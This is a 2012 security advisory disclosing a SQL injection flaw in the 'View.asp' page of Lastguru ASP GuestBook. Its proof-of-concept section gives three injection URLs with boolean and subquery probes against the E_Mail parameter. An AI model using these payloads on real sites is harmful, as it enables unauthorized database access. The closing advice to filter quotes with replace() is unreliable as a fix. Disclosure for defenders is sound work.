Lastguru ASP Guestbook suffers from a remote SQL injection vulnerability.
7647a173e3a544c79753938e1534393439d68cd8fb354d9d974f67bded9d6f47
Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability
Product : Lastguru ASP GuestBook
Version : Free Version
Vendor: http://www.LastGuru.com
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: 2012-03-04
Updated:
Impact : Medium (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P)
Bug Description :
Page 'View.asp' of Lastguru ASP GuestBook(Free Version) is vulnerable with SQL Injection Vulnerability.
POC:
#-------------------------------------------------------------
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='b
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 0<(select count(*) from [book]) and 'a'='a
etc...
#-------------------------------------------------------------
Advice:
Use 'replace()' for filtering single quote and other dangerous symbols.
Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK